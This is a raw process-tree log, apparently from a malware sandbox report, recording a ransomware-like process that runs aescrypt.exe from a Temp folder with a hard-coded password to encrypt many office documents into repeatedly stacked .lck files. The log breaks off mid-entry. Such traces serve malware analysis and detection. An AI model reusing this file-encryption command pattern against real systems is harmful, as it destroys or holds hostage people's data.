- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SendRedo.pub.lck.lck.lck" "SendRedo.pub.lck.lck"
    3⤵
    PID:1720
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck" "StepConnect.xlt"
    3⤵
    PID:224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck.lck" "StepConnect.xlt.lck"
    3⤵
    PID:1744
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StepConnect.xlt.lck.lck.lck" "StepConnect.xlt.lck.lck"
    3⤵
    PID:1604
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck" "EditPop.ppt"
    3⤵
    PID:1552
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck.lck" "EditPop.ppt.lck"
    3⤵
    PID:440
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EditPop.ppt.lck.lck.lck" "EditPop.ppt.lck.lck"
    3⤵
    PID:664
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck" "DisableUnlock.ppsm"
    3⤵
    PID:1656
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck.lck" "DisableUnlock.ppsm.lck"
    3⤵
    PID:788
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableUnlock.ppsm.lck.lck.lck" "DisableUnlock.ppsm.lck.lck"
    3⤵
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck" "ReceiveAssert.vstm"
    3⤵
    PID:220
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck.lck" "ReceiveAssert.vstm.lck"
    3⤵
    PID:2040
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveAssert.vstm.lck.lck.lck" "ReceiveAssert.vstm.lck.lck"
    3⤵
    PID:1160
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck" "ProtectSkip.xls"
    3⤵
    PID:216
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck.lck" "ProtectSkip.xls.lck"
    3⤵
    PID:1572
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ProtectSkip.xls.lck.lck.lck" "ProtectSkip.xls.lck.lck"
    3⤵
    PID:1224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck" "ApproveLimit.vsdx"
    3⤵
    PID:1704
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck.lck" "ApproveLimit.vsdx.lck"
    3⤵
    PID:760
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveLimit.vsdx.lck.lck.lck" "ApproveLimit.vsdx.lck.lck"
    3⤵
    PID:1200
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck" "UnlockOptimize.htm"
    3⤵
    PID:1468
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck.lck" "UnlockOptimize.htm.lck"
    3⤵
    PID:520
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockOptimize.htm.lck.lck.lck" "UnlockOptimize.htm.lck.lck"
    3⤵
    PID:960
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck" "SearchInstall.odp"
    3⤵
    PID:1576
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck.lck" "SearchInstall.odp.lck"
    3⤵
    PID:1276
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchInstall.odp.lck.lck.lck" "SearchInstall.odp.lck.lck"
    3⤵
    PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:228
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck.lck" "desktop.ini.lck"
    3⤵
    PID:1720
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck.lck.lck" "desktop.ini.lck.lck"
    3⤵
    PID:224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck.lck.lck.lck" "desktop.ini.lck.lck.lck"
    3⤵
    PID:1744
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck" "These.docx"
    3⤵
    PID:1604
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck" "Are.docx"
    3⤵
    PID:1552
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck" "Recently.docx"
    3⤵
    PID:440
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck" "Opened.docx"
    3⤵
    PID:664
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck" "Files.docx"
    3⤵
    PID:1656
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck.lck" "These.docx.lck"
    3⤵
    PID:1540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck.lck" "Are.docx.lck"
    3⤵
    PID:1928
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck.lck" "Recently.docx.lck"
    3⤵
    PID:1836
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck.lck" "Files.docx.lck"
    3⤵
    PID:1948
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck.lck" "Opened.docx.lck"
    3⤵
    PID:1256
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck.lck.lck" "These.docx.lck.lck"
    3⤵
    PID:236
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck.lck.lck" "Are.docx.lck.lck"
    3⤵
    PID:1564
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck.lck.lck" "Recently.docx.lck.lck"
    3⤵
    PID:1368
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck.lck.lck" "Files.docx.lck.lck"
    3⤵
    PID:1080
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck.lck.lck" "Opened.docx.lck.lck"
    3⤵
    PID:528
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "These.docx.lck.lck.lck.lck" "These.docx.lck.lck.lck"
    3⤵
    PID:968
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Recently.docx.lck.lck.lck.lck" "Recently.docx.lck.lck.lck"
    3⤵
    PID:944
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Are.docx.lck.lck.lck.lck" "Are.docx.lck.lck.lck"
    3⤵
    PID:1696
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Files.docx.lck.lck.lck.lck" "Files.docx.lck.lck.lck"
    3⤵
    PID:1952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Opened.docx.lck.lck.lck.lck" "Opened.docx.lck.lck.lck"
    3⤵
    PID:1640
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck" "SwitchOut.mhtml"
    3⤵
    PID:212
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck.lck" "SwitchOut.mhtml.lck"
    3⤵
    PID:972
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck.lck.lck" "SwitchOut.mhtml.lck.lck"
    3⤵
    PID:952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.mhtml.lck.lck.lck.lck" "SwitchOut.mhtml.lck.lck.lck"
    3⤵
    PID:1484
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck" "ShowMount.vsdx"
    3⤵
    PID:884
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck.lck" "ShowMount.vsdx.lck"
    3⤵
    PID:232
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck.lck.lck" "ShowMount.vsdx.lck.lck"
    3⤵
    PID:892
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ShowMount.vsdx.lck.lck.lck.lck" "ShowMount.vsdx.lck.lck.lck"
    3⤵
    PID:540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck" "ExpandInitialize.dotm"
    3⤵
    PID:912
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck.lck" "ExpandInitialize.dotm.lck"
    3⤵
    PID:584
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck.lck.lck" "ExpandInitialize.dotm.lck.lck"
    3⤵
    PID:344
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExpandInitialize.dotm.lck.lck.lck.lck" "ExpandInitialize.dotm.lck.lck.lck"
    3⤵
    PID:1908
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck" "RequestSave.vsdm"
    3⤵
    PID:208
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck.lck" "RequestSave.vsdm.lck"
    3⤵
    PID:1476
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck.lck.lck" "RequestSave.vsdm.lck.lck"
    3⤵
    PID:296
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestSave.vsdm.lck.lck.lck.lck" "RequestSave.vsdm.lck.lck.lck"
    3⤵
    PID:1532
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck" "PublishConnect.vdw"
    3⤵
    PID:1016
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck.lck" "PublishConnect.vdw.lck"
    3⤵
    PID:2028
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck.lck.lck" "PublishConnect.vdw.lck.lck"
    3⤵
    PID:1176
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "PublishConnect.vdw.lck.lck.lck.lck" "PublishConnect.vdw.lck.lck.lck"
    3⤵
    PID:788
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck" "WatchStart.docm"
    3⤵
    PID:1940
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck.lck" "WatchStart.docm.lck"
    3⤵
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck.lck.lck" "WatchStart.docm.lck.lck"
    3⤵
    PID:220
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchStart.docm.lck.lck.lck.lck" "WatchStart.docm.lck.lck.lck"
    3⤵
    PID:2040
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck" "InvokeSubmit.doc"
    3⤵
    PID:1160
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck.lck" "InvokeSubmit.doc.lck"
    3⤵
    PID:216
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck.lck.lck" "InvokeSubmit.doc.lck.lck"
    3⤵
    PID:1572
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeSubmit.doc.lck.lck.lck.lck" "InvokeSubmit.doc.lck.lck.lck"
    3⤵
    PID:1224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck" "FindSet.mhtml"
    3⤵
    PID:1704
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck.lck" "FindSet.mhtml.lck"
    3⤵
    PID:760
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck.lck.lck" "FindSet.mhtml.lck.lck"
    3⤵
    PID:1200
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindSet.mhtml.lck.lck.lck.lck" "FindSet.mhtml.lck.lck.lck"
    3⤵
    PID:1468
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck" "OptimizeRevoke.pptx"
    3⤵
    PID:520
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck.lck" "OptimizeRevoke.pptx.lck"
    3⤵
    PID:960
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck.lck.lck" "OptimizeRevoke.pptx.lck.lck"
    3⤵
    PID:1576
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OptimizeRevoke.pptx.lck.lck.lck.lck" "OptimizeRevoke.pptx.lck.lck.lck"
    3⤵
    PID:1276
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck" "ResolveResize.vsw"
    3⤵
    PID:1192
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck.lck" "ResolveResize.vsw.lck"
    3⤵
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck.lck.lck" "ResolveResize.vsw.lck.lck"
    3⤵
    PID:228
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResolveResize.vsw.lck.lck.lck.lck" "ResolveResize.vsw.lck.lck.lck"
    3⤵
    PID:1720
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck" "SaveWatch.vsw"
    3⤵
    PID:224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck.lck" "SaveWatch.vsw.lck"
    3⤵
    PID:1744
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveWatch.vsw.lck.lck.lck" "SaveWatch.vsw.lck.lck"
    3⤵
    PID:1604
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
